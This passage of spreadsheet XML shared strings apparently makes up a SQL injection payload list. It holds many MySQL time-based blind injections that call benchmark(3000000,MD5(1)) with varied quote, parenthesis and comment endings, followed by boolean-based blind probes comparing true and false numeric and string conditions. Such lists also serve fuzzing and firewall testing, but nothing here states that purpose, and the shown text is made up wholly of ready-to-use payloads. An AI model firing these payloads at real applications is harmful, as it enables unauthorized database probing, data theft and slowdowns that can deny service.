    <t>+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL,NULL,NULL )  %23</t>
  </si>
  <si>
    <t>'+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL,NULL,NULL )  /*</t>
  </si>
  <si>
    <t>'+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL,NULL,NULL )  --</t>
  </si>
  <si>
    <t>'+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL,NULL,NULL )  %23</t>
  </si>
  <si>
    <t>"+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL,NULL,NULL )  /*</t>
  </si>
  <si>
    <t>"+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL,NULL,NULL )  --</t>
  </si>
  <si>
    <t>"+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL,NULL,NULL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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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 )  --</t>
  </si>
  <si>
    <t>"+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL,NULL,NULL,NULL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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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"+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL )  --</t>
  </si>
  <si>
    <t>"+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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xml:space="preserve"> ) , ( select if ( count ( * ) ! = -1,benchmark ( 3000000,MD5 ( 1  )  )  ,benchmark ( 3000000,MD5 ( 1  )  )    )  )  /*</t>
  </si>
  <si>
    <t xml:space="preserve"> ) , ( select if ( count ( * ) ! = -1,benchmark ( 3000000,MD5 ( 1  )  )  ,benchmark ( 3000000,MD5 ( 1  )  )    )  )  --</t>
  </si>
  <si>
    <t xml:space="preserve"> ) , ( select if ( count ( * ) ! = -1,benchmark ( 3000000,MD5 ( 1  )  )  ,benchmark ( 3000000,MD5 ( 1  )  )    )  )  %23</t>
  </si>
  <si>
    <t>' ) , ( select if ( count ( * ) ! = -1,benchmark ( 3000000,MD5 ( 1  )  )  ,benchmark ( 3000000,MD5 ( 1  )  )    )  )  /*</t>
  </si>
  <si>
    <t>' ) , ( select if ( count ( * ) ! = -1,benchmark ( 3000000,MD5 ( 1  )  )  ,benchmark ( 3000000,MD5 ( 1  )  )    )  )  --</t>
  </si>
  <si>
    <t>' ) , ( select if ( count ( * ) ! = -1,benchmark ( 3000000,MD5 ( 1  )  )  ,benchmark ( 3000000,MD5 ( 1  )  )    )  )  %23</t>
  </si>
  <si>
    <t>" ) , ( select if ( count ( * ) ! = -1,benchmark ( 3000000,MD5 ( 1  )  )  ,benchmark ( 3000000,MD5 ( 1  )  )    )  )  /*</t>
  </si>
  <si>
    <t>" ) , ( select if ( count ( * ) ! = -1,benchmark ( 3000000,MD5 ( 1  )  )  ,benchmark ( 3000000,MD5 ( 1  )  )    )  )  --</t>
  </si>
  <si>
    <t>" ) , ( select if ( count ( * ) ! = -1,benchmark ( 3000000,MD5 ( 1  )  )  ,benchmark ( 3000000,MD5 ( 1  )  )    )  )  %23</t>
  </si>
  <si>
    <t xml:space="preserve"> and 0 = benchmark ( 3000000,MD5 ( 1  )  )   /*</t>
  </si>
  <si>
    <t xml:space="preserve"> and 0 = benchmark ( 3000000,MD5 ( 1  )  )   --</t>
  </si>
  <si>
    <t xml:space="preserve"> and 0 = benchmark ( 3000000,MD5 ( 1  )  )   %23</t>
  </si>
  <si>
    <t>' and 0 = benchmark ( 3000000,MD5 ( 1  )  )   /*</t>
  </si>
  <si>
    <t>' and 0 = benchmark ( 3000000,MD5 ( 1  )  )   --</t>
  </si>
  <si>
    <t>' and 0 = benchmark ( 3000000,MD5 ( 1  )  )   %23</t>
  </si>
  <si>
    <t>" and 0 = benchmark ( 3000000,MD5 ( 1  )  )   /*</t>
  </si>
  <si>
    <t>" and 0 = benchmark ( 3000000,MD5 ( 1  )  )   --</t>
  </si>
  <si>
    <t>" and 0 = benchmark ( 3000000,MD5 ( 1  )  )   %23</t>
  </si>
  <si>
    <t xml:space="preserve"> )  and 0 = benchmark ( 3000000,MD5 ( 1  )  )   /*</t>
  </si>
  <si>
    <t xml:space="preserve"> )  and 0 = benchmark ( 3000000,MD5 ( 1  )  )   --</t>
  </si>
  <si>
    <t xml:space="preserve"> )  and 0 = benchmark ( 3000000,MD5 ( 1  )  )   %23</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   and 0 = benchmark ( 3000000,MD5 ( 1  )  )   /*</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   and 0 = benchmark ( 3000000,MD5 ( 1  )  )   --</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   and 0 = benchmark ( 3000000,MD5 ( 1  )  )   %23</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  and 0 = benchmark ( 3000000,MD5 ( 1  )  )   /*</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  and 0 = benchmark ( 3000000,MD5 ( 1  )  )   --</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  and 0 = benchmark ( 3000000,MD5 ( 1  )  )   %23</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )    )  )   and 0 = benchmark ( 3000000,MD5 ( 1  )  )   /*</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )    )  )   and 0 = benchmark ( 3000000,MD5 ( 1  )  )   --</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )    )  )   and 0 = benchmark ( 3000000,MD5 ( 1  )  )   %23</t>
  </si>
  <si>
    <t>' )  and 0 = benchmark ( 3000000,MD5 ( 1  )  )   /*</t>
  </si>
  <si>
    <t>' )  and 0 = benchmark ( 3000000,MD5 ( 1  )  )   --</t>
  </si>
  <si>
    <t>' )  and 0 = benchmark ( 3000000,MD5 ( 1  )  )   %23</t>
  </si>
  <si>
    <t>" )  and 0 = benchmark ( 3000000,MD5 ( 1  )  )   /*</t>
  </si>
  <si>
    <t>" )  and 0 = benchmark ( 3000000,MD5 ( 1  )  )   --</t>
  </si>
  <si>
    <t>" )  and 0 = benchmark ( 3000000,MD5 ( 1  )  )   %23</t>
  </si>
  <si>
    <t>'  )  )   and 0 = benchmark ( 3000000,MD5 ( 1  )  )   /*</t>
  </si>
  <si>
    <t>'  )  )   and 0 = benchmark ( 3000000,MD5 ( 1  )  )   --</t>
  </si>
  <si>
    <t>'  )  )   and 0 = benchmark ( 3000000,MD5 ( 1  )  )   %23</t>
  </si>
  <si>
    <t>"  )  )   and 0 = benchmark ( 3000000,MD5 ( 1  )  )   /*</t>
  </si>
  <si>
    <t>"  )  )   and 0 = benchmark ( 3000000,MD5 ( 1  )  )   --</t>
  </si>
  <si>
    <t>"  )  )   and 0 = benchmark ( 3000000,MD5 ( 1  )  )   %23</t>
  </si>
  <si>
    <t>'  )  )   )  and 0 = benchmark ( 3000000,MD5 ( 1  )  )   /*</t>
  </si>
  <si>
    <t>'  )  )   )  and 0 = benchmark ( 3000000,MD5 ( 1  )  )   --</t>
  </si>
  <si>
    <t>'  )  )   )  and 0 = benchmark ( 3000000,MD5 ( 1  )  )   %23</t>
  </si>
  <si>
    <t>"  )  )   )  and 0 = benchmark ( 3000000,MD5 ( 1  )  )   /*</t>
  </si>
  <si>
    <t>"  )  )   )  and 0 = benchmark ( 3000000,MD5 ( 1  )  )   --</t>
  </si>
  <si>
    <t>"  )  )   )  and 0 = benchmark ( 3000000,MD5 ( 1  )  )   %23</t>
  </si>
  <si>
    <t>'  )  )    )  )   and 0 = benchmark ( 3000000,MD5 ( 1  )  )   /*</t>
  </si>
  <si>
    <t>'  )  )    )  )   and 0 = benchmark ( 3000000,MD5 ( 1  )  )   --</t>
  </si>
  <si>
    <t>'  )  )    )  )   and 0 = benchmark ( 3000000,MD5 ( 1  )  )   %23</t>
  </si>
  <si>
    <t>"  )  )    )  )   and 0 = benchmark ( 3000000,MD5 ( 1  )  )   /*</t>
  </si>
  <si>
    <t>"  )  )    )  )   and 0 = benchmark ( 3000000,MD5 ( 1  )  )   --</t>
  </si>
  <si>
    <t>"  )  )    )  )   and 0 = benchmark ( 3000000,MD5 ( 1  )  )   %23</t>
  </si>
  <si>
    <t xml:space="preserve"> )  AND 93 = 93</t>
  </si>
  <si>
    <t xml:space="preserve"> )  AND 9170 = 2793</t>
  </si>
  <si>
    <t>' )  AND 7364 = 5114</t>
  </si>
  <si>
    <t>' )  AND 93 = 93</t>
  </si>
  <si>
    <t>' )  AND 4731 = 891</t>
  </si>
  <si>
    <t>' AND 5874 = 2869</t>
  </si>
  <si>
    <t>' AND 93 = 93</t>
  </si>
  <si>
    <t>' AND 529 = 7832</t>
  </si>
  <si>
    <t>" AND 5183 = 1335</t>
  </si>
  <si>
    <t>" AND 93 = 93</t>
  </si>
  <si>
    <t>" AND 5984 = 4419</t>
  </si>
  <si>
    <t xml:space="preserve"> )  AND 8703 = 8428 AND  ( 7243 = 7243</t>
  </si>
  <si>
    <t xml:space="preserve"> )  AND 93 = 93 AND  ( 5302 = 5302</t>
  </si>
  <si>
    <t xml:space="preserve"> )  AND 8117 = 9417 AND  ( 1286 = 1286</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   AND 3196 = 7637 AND   (  (  6424 = 6424</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   AND 93 = 93 AND   (  (  1849 = 1849</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   AND 4113 = 33 AND   (  (  6244 = 6244</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  AND 7371 = 4214 AND   (  (   ( 6219 = 6219</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  AND 93 = 93 AND   (  (   ( 2816 = 2816</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  AND 9563 = 2025 AND   (  (   ( 4031 = 4031</t>
  </si>
  <si>
    <t xml:space="preserve"> AND 5642 = 4589</t>
  </si>
  <si>
    <t xml:space="preserve"> AND 93 = 93</t>
  </si>
  <si>
    <t xml:space="preserve"> AND 431 = 3779</t>
  </si>
  <si>
    <t>' )  AND 9503 = 9264 AND  ( 'bRfS' = 'bRfS</t>
  </si>
  <si>
    <t>' )  AND 93 = 93 AND  ( 'ZIYy' = 'ZIYy</t>
  </si>
  <si>
    <t>' )  AND 8638 = 8712 AND  ( 'twvD' = 'twvD</t>
  </si>
  <si>
    <t>'  )  )   AND 2746 = 5177 AND   (  (  'vIva' = 'vIva</t>
  </si>
  <si>
    <t>'  )  )   AND 93 = 93 AND   (  (  'dunz' = 'dunz</t>
  </si>
  <si>
    <t>'  )  )   AND 1340 = 9153 AND   (  (  'sXcm' = 'sXcm</t>
  </si>
  <si>
    <t>'  )  )   )  AND 7025 = 7439 AND   (  (   ( 'wzOL' = 'wzOL</t>
  </si>
  <si>
    <t>'  )  )   )  AND 93 = 93 AND   (  (   ( 'oMMM' = 'oMMM</t>
  </si>
  <si>
    <t>'  )  )   )  AND 9421 = 9484 AND   (  (   ( 'ZaIT' = 'ZaIT</t>
  </si>
  <si>
    <t>' AND 2218 = 4751 AND 'ixQM' = 'ixQM</t>
  </si>
  <si>
    <t>' AND 93 = 93 AND 'bleu' = 'bleu</t>
  </si>
  <si>
    <t>' AND 6445 = 6310 AND 'ECOC' = 'ECOC</t>
  </si>
  <si>
    <t>' )  AND 5219 = 9633 AND  ( 'mlgR' LIKE 'mlgR</t>
  </si>
  <si>
    <t>' )  AND 93 = 93 AND  ( 'KDlb' LIKE 'KDlb</t>
  </si>
  <si>
    <t>' )  AND 7066 = 1108 AND  ( 'DIva' LIKE 'DIva</t>
  </si>
  <si>
    <t>'  )  )   AND 5824 = 3983 AND   (  (  'dGjV' LIKE 'dGjV</t>
  </si>
  <si>
    <t>'  )  )   AND 93 = 93 AND   (  (  'eOHm' LIKE 'eOHm</t>
  </si>
  <si>
    <t>'  )  )   AND 9066 = 5960 AND   (  (  'TKKi' LIKE 'TKKi</t>
  </si>
  <si>
    <t>'  )  )   )  AND 7586 = 6671 AND   (  (   ( 'IJbl' LIKE 'IJbl</t>
  </si>
  <si>
    <t>'  )  )   )  AND 93 = 93 AND   (  (   ( 'UFCU' LIKE 'UFCU</t>
  </si>
  <si>
    <t>'  )  )   )  AND 6476 = 115 AND   (  (   ( 'tCfT' LIKE 'tCfT</t>
  </si>
  <si>
    <t>' AND 2116 = 1625 AND 'DyoS' LIKE 'DyoS</t>
  </si>
  <si>
    <t>' AND 93 = 93 AND 'IJBj' LIKE 'IJBj</t>
  </si>
  <si>
    <t>' AND 1517 = 8497 AND 'lpul' LIKE 'lpul</t>
  </si>
  <si>
    <t>" )  AND 2936 = 9230 AND  ( "rDPV" = "rDPV</t>
  </si>
  <si>
    <t>" )  AND 93 = 93 AND  ( "pZoR" = "pZoR</t>
  </si>
  <si>
    <t>" )  AND 1933 = 3702 AND  ( "jwwH" = "jwwH</t>
  </si>
  <si>
    <t>"  )  )   AND 4900 = 3539 AND   (  (  "HYtj" = "HYtj</t>
  </si>
  <si>
    <t>"  )  )   AND 93 = 93 AND   (  (  "qkRk" = "qkRk</t>
  </si>
  <si>
    <t>"  )  )   AND 8193 = 3294 AND   (  (  "mjNX" = "mjNX</t>
  </si>
  <si>
    <t>"  )  )   )  AND 6498 = 9413 AND   (  (   ( "uIow" = "uIow</t>
  </si>
  <si>
    <t>"  )  )   )  AND 93 = 93 AND   (  (   ( "dOOU" = "dOOU</t>
  </si>
  <si>
    <t>"  )  )   )  AND 4494 = 4573 AND   (  (   ( "FMee" = "FMee</t>
  </si>
  <si>
    <t>" AND 6640 = 346 AND "NEeP" = "NEeP</t>
  </si>
  <si>
    <t>" AND 93 = 93 AND "sBHy" = "sBHy</t>
  </si>
  <si>
    <t>" AND 1883 = 7243 AND "xwIr" = "xwIr</t>
  </si>
  <si>
    <t>" )  AND 1381 = 7185 AND  ( "kCds" LIKE "kCds</t>
  </si>
  <si>
    <t>" )  AND 93 = 93 AND  ( "KkVS" LIKE "KkVS</t>
  </si>
  <si>
    <t>" )  AND 2174 = 2139 AND  ( "GUZH" LIKE "GUZH</t>
  </si>
  <si>
    <t>"  )  )   AND 6380 = 2316 AND   (  (  "WXVE" LIKE "WXVE</t>
  </si>
  <si>
    <t>"  )  )   AND 93 = 93 AND   (  (  "qLfT" LIKE "qLfT</t>
  </si>
  <si>
    <t>"  )  )   AND 1768 = 8876 AND   (  (  "claR" LIKE "claR</t>
  </si>
  <si>
    <t>"  )  )   )  AND 9829 = 4267 AND   (  (   ( "WSJV" LIKE "WSJV</t>
  </si>
  <si>
    <t>"  )  )   )  AND 93 = 93 AND   (  (   ( "vdKf" LIKE "vdKf</t>
  </si>
  <si>
    <t>"  )  )   )  AND 3266 = 2425 AND   (  (   ( "AhsM" LIKE "AhsM</t>
  </si>
  <si>
    <t>" AND 7270 = 3819 AND "gAaC" LIKE "gAaC</t>
  </si>
  <si>
    <t>" AND 93 = 93 AND "NChk" LIKE "NChk</t>
  </si>
  <si>
    <t>" AND 5351 = 7546 AND "NvbO" LIKE "NvbO</t>
  </si>
  <si>
    <t xml:space="preserve"> )  AND 9608 = 6061#</t>
  </si>
  <si>
    <t xml:space="preserve"> )  AND 2691 = 2691#</t>
  </si>
  <si>
    <t xml:space="preserve"> )  AND 8748 = 279#</t>
  </si>
  <si>
    <t>' )  AND 1336 = 2396#</t>
  </si>
  <si>
    <t>' )  AND 2691 = 2691#</t>
  </si>
  <si>
    <t>' )  AND 5675 = 1461#</t>
  </si>
  <si>
    <t>' AND 4504 = 7825#</t>
  </si>
  <si>
    <t>' AND 2691 = 2691#</t>
  </si>
  <si>
    <t>' AND 1508 = 4671#</t>
  </si>
  <si>
    <t>" AND 3915 = 3182#</t>
  </si>
  <si>
    <t>" AND 2691 = 2691#</t>
  </si>
  <si>
    <t>" AND 4410 = 9697#</t>
  </si>
  <si>
    <t xml:space="preserve"> )  AND 8019 = 8524# AND  ( 9804 = 9804</t>
  </si>
  <si>
    <t xml:space="preserve"> )  AND 2691 = 2691# AND  ( 7691 = 7691</t>
  </si>
  <si>
    <t xml:space="preserve"> )  AND 1756 = 6684# AND  ( 2826 = 2826</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   AND 5038 = 3127# AND   (  (  3455 = 3455</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   AND 2691 = 2691# AND   (  (  7183 = 7183</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   AND 1742 = 3015# AND   (  (  4894 = 4894</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  AND 3245 = 3156# AND   (  (   ( 7003 = 7003</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  AND 2691 = 2691# AND   (  (   ( 7036 = 7036</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  AND 4694 = 2332# AND   (  (   ( 4760 = 4760</t>
  </si>
  <si>
    <t xml:space="preserve"> AND 6392 = 984#</t>
  </si>
  <si>
    <t xml:space="preserve"> AND 2691 = 2691#</t>
  </si>
  <si>
    <t xml:space="preserve"> AND 8655 = 5196#</t>
  </si>
  <si>
    <t>' )  AND 6317 = 5240# AND  ( 'IRaT' = 'IRaT</t>
  </si>
  <si>
    <t>' )  AND 2691 = 2691# AND  ( 'brPj' = 'brPj</t>
  </si>
  <si>
    <t>' )  AND 1635 = 5249# AND  ( 'kWsh' = 'kWsh</t>
  </si>
  <si>
    <t>'  )  )   AND 9005 = 295# AND   (  (  'WEyY' = 'WEyY</t>
  </si>
  <si>
    <t>'  )  )   AND 2691 = 2691# AND   (  (  'sjBM' = 'sjBM</t>
  </si>
  <si>
    <t>'  )  )   AND 7289 = 7997# AND   (  (  'rTTb' = 'rTTb</t>
  </si>
  <si>
    <t>'  )  )   )  AND 9373 = 4888# AND   (  (   ( 'FDxz' = 'FDxz</t>
  </si>
  <si>
    <t>'  )  )   )  AND 2691 = 2691# AND   (  (   ( 'DExy' = 'DExy</t>
  </si>
  <si>
    <t>'  )  )   )  AND 2474 = 1083# AND   (  (   ( 'ajQS' = 'ajQS</t>
  </si>
  <si>
    <t>' AND 2690 = 2219# AND 'uoUs' = 'uoUs</t>
  </si>
  <si>
    <t>' AND 2691 = 2691# AND 'Yfej' = 'Yfej</t>
  </si>
  <si>
    <t>' AND 527 = 4289# AND 'jplr' = 'jplr</t>
  </si>
  <si>
    <t>' )  AND 8142 = 7307# AND  ( 'KiQz' LIKE 'KiQz</t>
  </si>
  <si>
    <t>' )  AND 2691 = 2691# AND  ( 'tOBm' LIKE 'tOBm</t>
  </si>
  <si>
    <t>' )  AND 8150 = 1461# AND  ( 'dLTR' LIKE 'dLTR</t>
  </si>
  <si>
    <t>'  )  )   AND 113 = 9550# AND   (  (  'SpXM' LIKE 'SpXM</t>
  </si>
  <si>
    <t>'  )  )   AND 2691 = 2691# AND   (  (  'sUpa' LIKE 'sUpa</t>
  </si>
  <si>
    <t>'  )  )   AND 737 = 892# AND   (  (  'xJjb' LIKE 'xJjb</t>
  </si>
  <si>
    <t>'  )  )   )  AND 4319 = 5374# AND   (  (   ( 'fYjS' LIKE 'fYjS</t>
  </si>
  <si>
    <t>'  )  )   )  AND 2691 = 2691# AND   (  (   ( 'rCSx' LIKE 'rCSx</t>
  </si>
  <si>
    <t>'  )  )   )  AND 2273 = 4910# AND   (  (   ( 'AthN' LIKE 'AthN</t>
  </si>
  <si>
    <t>' AND 3451 = 6376# AND 'Yike' LIKE 'Yike</t>
  </si>
  <si>
    <t>' AND 2691 = 2691# AND 'vVbX' LIKE 'vVbX</t>
  </si>
  <si>
    <t>' AND 1669 = 6643# AND 'QAFC' LIKE 'QAFC</t>
  </si>
  <si>
    <t>" )  AND 8415 = 6663# AND  ( "gpJd" = "gpJd</t>
  </si>
  <si>
    <t>" )  AND 2691 = 2691# AND  ( "SYEj" = "SYEj</t>
  </si>
  <si>
    <t>" )  AND 2288 = 5698# AND  ( "xPaQ" = "xPaQ</t>
  </si>
  <si>
    <t>"  )  )   AND 6149 = 2111# AND   (  (  "zpsN" = "zpsN</t>
  </si>
  <si>
    <t>"  )  )   AND 2691 = 2691# AND   (  (  "EmWE" = "EmWE</t>
  </si>
  <si>
    <t>"  )  )   AND 3110 = 2207# AND   (  (  "utHu" = "utHu</t>
  </si>
  <si>
    <t>"  )  )   )  AND 8708 = 9144# AND   (  (   ( "BHSp" = "BHSp</t>
  </si>
  <si>
    <t>"  )  )   )  AND 2691 = 2691# AND   (  (   ( "hfDC" = "hfDC</t>
  </si>
  <si>
    <t>"  )  )   )  AND 96 = 9683# AND   (  (   ( "VYpz" = "VYpz</t>
  </si>
  <si>
    <t>" AND 1984 = 2283# AND "iNVP" = "iNVP</t>
  </si>
  <si>
    <t>" AND 2691 = 2691# AND "ZHqh" = "ZHqh</t>
  </si>
  <si>
    <t>" AND 3931 = 7650# AND "bbDk" = "bbDk</t>
  </si>
  <si>
    <t>" )  AND 3410 = 4323# AND  ( "uVwj" LIKE "uVwj</t>
  </si>
  <si>
    <t>" )  AND 2691 = 2691# AND  ( "xPQl" LIKE "xPQl</t>
  </si>
  <si>
    <t>" )  AND 877 = 5577# AND  ( "vsvj" LIKE "vsvj</t>
  </si>
  <si>
    <t>"  )  )   AND 9708 = 4865# AND   (  (  "NnEa" LIKE "NnEa</t>
  </si>
  <si>
    <t>"  )  )   AND 2691 = 2691# AND   (  (  "uTrF" LIKE "uTrF</t>
  </si>
  <si>
    <t>"  )  )   AND 8871 = 9018# AND   (  (  "YDlf" LIKE "YDlf</t>
  </si>
  <si>
    <t>"  )  )   )  AND 2360 = 3092# AND   (  (   ( "iXQa" LIKE "iXQa</t>
  </si>
  <si>
    <t>"  )  )   )  AND 2691 = 2691# AND   (  (   ( "MFPQ" LIKE "MFPQ</t>
  </si>
  <si>
    <t>"  )  )   )  AND 5123 = 2435# AND   (  (   ( "WHEO" LIKE "WHEO</t>
  </si>
  <si>
    <t>" AND 6588 = 6531# AND "BEnU" LIKE "BEnU</t>
  </si>
  <si>
    <t>" AND 2691 = 2691# AND "XmRT" LIKE "XmRT</t>
  </si>
  <si>
    <t>" AND 7631 = 5967# AND "IuLV" LIKE "IuLV</t>
  </si>
  <si>
    <t xml:space="preserve"> )  AND 2752 = 7511--</t>
  </si>
  <si>
    <t xml:space="preserve"> )  AND 6695 = 6695--</t>
  </si>
  <si>
    <t xml:space="preserve"> )  AND 771 = 627--</t>
  </si>
  <si>
    <t>' )  AND 70 = 1004--</t>
  </si>
  <si>
    <t>' )  AND 6695 = 6695--</t>
  </si>
  <si>
    <t>' )  AND 1939 = 600--</t>
  </si>
  <si>
    <t>' AND 8360 = 446--</t>
  </si>
  <si>
    <t>' AND 6695 = 6695--</t>
  </si>
  <si>
    <t>' AND 1492 = 6452--</t>
  </si>
  <si>
    <t>" AND 839 = 6259--</t>
  </si>
  <si>
    <t>" AND 6695 = 6695--</t>
  </si>
  <si>
    <t>" AND 5465 = 8501--</t>
  </si>
  <si>
    <t xml:space="preserve"> )  AND 2276 = 5018-- AND  ( 2264 = 2264</t>
  </si>
  <si>
    <t xml:space="preserve"> )  AND 6695 = 6695-- AND  ( 5741 = 5741</t>
  </si>
  <si>
    <t xml:space="preserve"> )  AND 5050 = 7720-- AND  ( 3340 = 3340</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   AND 1868 = 3960-- AND   (  (  241 = 241</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   AND 6695 = 6695-- AND   (  (  8320 = 8320</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   AND 2668 = 9563-- AND   (  (  7920 = 7920</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  AND 8025 = 4290-- AND   (  (   ( 6935 = 6935</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  AND 6695 = 6695-- AND   (  (   ( 8636 = 8636</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  AND 9346 = 2080-- AND   (  (   ( 7093 = 7093</t>
  </si>
  <si>
    <t xml:space="preserve"> AND 5925 = 9447--</t>
  </si>
  <si>
    <t xml:space="preserve"> AND 6695 = 6695--</t>
  </si>
  <si>
    <t xml:space="preserve"> AND 6604 = 459--</t>
  </si>
  <si>
    <t>' )  AND 1492 = 4010-- AND  ( 'IggO' = 'IggO</t>
  </si>
  <si>
    <t>' )  AND 6695 = 6695-- AND  ( 'zTnV' = 'zTnV</t>
  </si>
  <si>
    <t>' )  AND 7703 = 7310-- AND  ( 'TMpd' = 'TMpd</t>
  </si>
  <si>
    <t>'  )  )   AND 2571 = 5533-- AND   (  (  'ZeAw' = 'ZeAw</t>
  </si>
  <si>
    <t>'  )  )   AND 6695 = 6695-- AND   (  (  'qpUx' = 'qpUx</t>
  </si>
  <si>
    <t>'  )  )   AND 9109 = 8401-- AND   (  (  'iHVS' = 'iHVS</t>
  </si>
  <si>
    <t>'  )  )   )  AND 3587 = 1004-- AND   (  (   ( 'KFoW' = 'KFoW</t>
  </si>
  <si>
    <t>'  )  )   )  AND 6695 = 6695-- AND   (  (   ( 'KPwq' = 'KPwq</t>
  </si>
  <si>
    <t>'  )  )   )  AND 3399 = 2610-- AND   (  (   ( 'TXfr' = 'TXfr</t>
  </si>
  <si>
    <t>' AND 5813 = 2611-- AND 'RYor' = 'RYor</t>
  </si>
  <si>
    <t>' AND 6695 = 6695-- AND 'busV' = 'busV</t>
  </si>
  <si>
    <t>' AND 7994 = 6746-- AND 'GwRH' = 'GwRH</t>
  </si>
  <si>
    <t>' )  AND 7401 = 8302-- AND  ( 'ermh' LIKE 'ermh</t>
  </si>
  <si>
    <t>' )  AND 6695 = 6695-- AND  ( 'ZIIt' LIKE 'ZIIt</t>
  </si>
  <si>
    <t>' )  AND 7540 = 6463-- AND  ( 'mpGd' LIKE 'mpGd</t>
  </si>
  <si>
    <t>'  )  )   AND 9882 = 9589-- AND   (  (  'rBFA' LIKE 'rBFA</t>
  </si>
  <si>
    <t>'  )  )   AND 6695 = 6695-- AND   (  (  'pPkl' LIKE 'pPkl</t>
  </si>
  <si>
    <t>'  )  )   AND 6649 = 623-- AND   (  (  'dHik' LIKE 'dHik</t>
  </si>
  <si>
    <t>'  )  )   )  AND 9119 = 8874-- AND   (  (   ( 'yqjx' LIKE 'yqjx</t>
  </si>
  <si>
    <t>'  )  )   )  AND 6695 = 6695-- AND   (  (   ( 'hebG' LIKE 'hebG</t>
  </si>
  <si>
    <t>'  )  )   )  AND 1305 = 1248-- AND   (  (   ( 'ViWt' LIKE 'ViWt</t>
  </si>
  <si>
    <t>' AND 2171 = 772-- AND 'vFie' LIKE 'vFie</t>
  </si>
  <si>
    <t>' AND 6695 = 6695-- AND 'YVqt' LIKE 'YVqt</t>
  </si>
  <si>
    <t>' AND 7170 = 9468-- AND 'ghMF' LIKE 'ghMF</t>
  </si>
  <si>
    <t>" )  AND 2158 = 7537-- AND  ( "yFMM" = "yFMM</t>
  </si>
  <si>
    <t>" )  AND 6695 = 6695-- AND  ( "nuFR" = "nuFR</t>
  </si>
  <si>
    <t>" )  AND 5081 = 7464-- AND  ( "LdDS" = "LdDS</t>
  </si>
  <si>
    <t>"  )  )   AND 7075 = 5925-- AND   (  (  "JbxU" = "JbxU</t>
  </si>
  <si>
    <t>"  )  )   AND 6695 = 6695-- AND   (  (  "ExTM" = "ExTM</t>
  </si>
  <si>
    <t>"  )  )   AND 8508 = 2184-- AND   (  (  "fVyw" = "fVyw</t>
  </si>
  <si>
    <t>"  )  )   )  AND 7924 = 9968-- AND   (  (   ( "GSpg" = "GSpg</t>
  </si>
  <si>
    <t>"  )  )   )  AND 6695 = 6695-- AND   (  (   ( "JaFA" = "JaFA</t>
  </si>
  <si>
    <t>"  )  )   )  AND 5379 = 8511-- AND   (  (   ( "XkVm" = "XkVm</t>
  </si>
  <si>
    <t>" AND 9135 = 1196-- AND "BYgq" = "BYgq</t>
  </si>
  <si>
    <t>" AND 6695 = 6695-- AND "meTb" = "meTb</t>
  </si>
  <si>
    <t>" AND 1099 = 2423-- AND "XuCr" = "XuCr</t>
  </si>
  <si>
    <t>" )  AND 1947 = 5519-- AND  ( "rZvg" LIKE "rZvg</t>
  </si>
  <si>
    <t>" )  AND 6695 = 6695-- AND  ( "irXh" LIKE "irXh</t>
  </si>
  <si>
    <t>" )  AND 3140 = 981-- AND  ( "rPfp" LIKE "rPfp</t>
  </si>
  <si>
    <t>"  )  )   AND 6747 = 7120-- AND   (  (  "MJct" LIKE "MJct</t>
  </si>
  <si>
